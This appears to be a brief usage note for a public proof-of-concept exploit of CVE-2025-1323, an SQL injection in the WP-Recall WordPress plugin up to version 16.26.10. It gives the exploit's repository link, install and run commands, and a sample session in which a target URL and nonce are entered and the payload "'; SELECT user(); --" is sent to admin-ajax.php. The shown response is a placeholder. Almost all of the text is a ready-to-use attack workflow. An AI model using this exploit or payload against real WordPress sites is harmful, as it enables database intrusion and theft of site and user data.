WP-Recall ≤ v16.26.10
PoC: https://github.com/p33d/cve-2025-1323
pip install requests
python CVE-2025-1323.py
Enter target URL (e.g. https://target.com/wp-admin/admin-ajax.php): https://example.com/wp-admin/admin-ajax.php
Enter ajax_nonce value: 37c11b0c06
[*] Sending payload: '; SELECT user(); --
[+] Response received:
{"result":"SQL error or leaked data here..."}